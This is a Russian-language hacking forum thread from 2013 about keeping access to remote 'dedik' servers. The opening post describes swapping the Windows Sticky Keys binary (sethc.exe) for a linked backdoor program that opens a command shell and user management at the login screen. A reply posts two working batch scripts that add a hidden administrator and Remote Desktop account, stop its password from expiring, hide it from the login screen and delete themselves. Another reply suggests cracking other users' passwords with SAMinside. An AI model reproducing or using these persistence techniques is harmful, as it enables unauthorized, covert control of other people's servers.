Перейти к публикации
malavita

Восстанавливаемый дедик (2013)

Рекомендованные сообщения

Привет всем, друзья.Не каждый может купить дедики. Сегодня я хочу рассказать о возможно для кого-то очевидных вещах.Мы сделаем наш дедик (обязательно с админ правами) восстанавливаемым. Если бы знаете что такое залипание клавишь в Win системах, то знаете, что на дедике с правами админа его можно заменить.
Этим мы и воспользуемся...

Я написал небольшую прожку для вас. Прощу не ругать за вес.. Писал в QT, те кто знают, что это поймут почему такой размерwink.gif

Цитата:
1)Прога на QT 12 мб короче на любителя... http://ge.tt/3Omvwr81
Пароль архива: korovka.top

2)Прога 18кб чистый с++ консоль... http://www.sendspace.com/file/f0ogcp

 

Цитата:
Небольшое отступление. Что умеет прога.
- Запускать Диспетчер задач.
- Запускать CMD.
- Запускать редактирование юзерами.
- Все это только по пароль "korovka". Заметите где ввести)

 


Итак в чем трудность. Поменять файл по пути.
1) C:\Windows\System32\
2) Находим файл sethc.exe
3) Заходим в свойства sethc.exe: идем в Безопасность , Дополнительно , Владелец, Меняем владельца на нашу учетку.
4) Опять же в свойствах sethc.exe: Безопасность, изменить, добавляем нашу учетку и жмякаем ОК.
5) Меняем файл sethc.exe на тот что написал [сарказм] великий кодер Я [/сарказм], незабыв переименовать его на "sethc.exe".

 

 

 

29bc8468e605.png

 


Итак, готово! Теперь при входе, если юзер поменял пароль вы просто жмякаете судорожно клавишу SHIFT, вызывая залипание, и вуаля... у нас есть cmd, управление юзерами и диспетчер задач.


Спасибо за внимание. Информация не является супер приватом. Лишь немного смекалки.

__________________________________________

15.12.13 UPD: добавил файлик 18кб веса. Чисто консольное.

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Спасибо друг.
Теперь самый главный вопрос, что она стащит с дедика для тебя?
В чём твой интерес? ИП, Логин, Пасс? Или одного ИП достаточно?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Цитата:
Сообщение от Refcat Посмотреть сообщение
Спасибо друг.
Теперь самый главный вопрос, что она стащит с дедика для тебя?
В чём твой интерес? ИП, Логин, Пасс? Или одного ИП достаточно?
это файл qt. исходный код прост как 5 пальцев... и нету ничего от декомпиляции. так что смотрите на здоровье)
проснифь кто хочет)))

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Этот способ давно не новый, никакой инновации не увидел.
Не буду уточнять что именно безполезного в этой программе, скажу только что по моему мнению было бы действительно полезно.
Во первых это автоматическая установка (замена sethc.exe) на файл, который умеет сам создавать учётную запись, помещать в необходимые группы пользователей. Надо учитывать, что дедики бывают на разных языках

P.S. замечал некоторые антивирусы ругаются на такую замену.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Поддерживаю Daniel777 вот если бы автоматически заменялся файл sethc.exe на нужный нам цены бы не было!А так каждый раз все приходиться делать руками.Если в гугле поискать 1 или 2 сыль про эту замену sethc.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Повторяю) Я не претендую на новацию. Данный способ извесен наверное. Но я не видел, скажу честно ничего подобного...
А по поводу автозамены это проблемно лично для меня как для програмера, т.к. только начинающий и не умею правами управлять.
Как смогу сразу сделаю...

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Оставлю тут два файла ТСу на изучение (на мой взгляд без выполнения этих функций программа будет безполезна), а может и еще кому пригодится. Первый для создания скрытой учётки на английской винде. Второй - на всяких "экзотических" дедах выполняет аналогичный первому функционал.
Код:
net user test qwerty /add
net localgroup Administrators test /add
net localgroup "Remote Desktop Users" test /add
net accounts /maxpwage:unlimited
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v test /t REG_DWORD /d "00000000" /f
Код:
@echo off
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user test qwerty /add
net localgroup %AdmGroup% test /add
rem
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" test /add
net accounts /maxpwage:unlimited
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v test /t REG_DWORD /d 0 /f
del %0

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Цитата:
Сообщение от Daniel777 Посмотреть сообщение
Оставлю тут два файла ТСу на изучение (на мой взгляд без выполнения этих функций программа будет безполезна), а может и еще кому пригодится. Первый для создания скрытой учётки на английской винде. Второй - на всяких "экзотических" дедах выполняет аналогичный первому функционал.
Код:
net user test qwerty /add
net localgroup Administrators test /add
net localgroup "Remote Desktop Users" test /add
net accounts /maxpwage:unlimited
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v test /t REG_DWORD /d "00000000" /f
Код:
@echo off
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user test qwerty /add
net localgroup %AdmGroup% test /add
rem
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" test /add
net accounts /maxpwage:unlimited
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v test /t REG_DWORD /d 0 /f
del %0
Спасибо... сделаю. Проблема в мультиязычности только

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Криво как-то это. Надо смотреть глубже.
Если у вас есть админ на дедике, то не лучше ли подобрать пароли всех остальных пользователей деда? А их там, как правило, не мало. Всем пассы не сменят.
И да поможет вам в этом SAMinside.
Никакого палева, никаких антивирей, никакого, блять, Qt для 10кб проги из трёх строк.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

×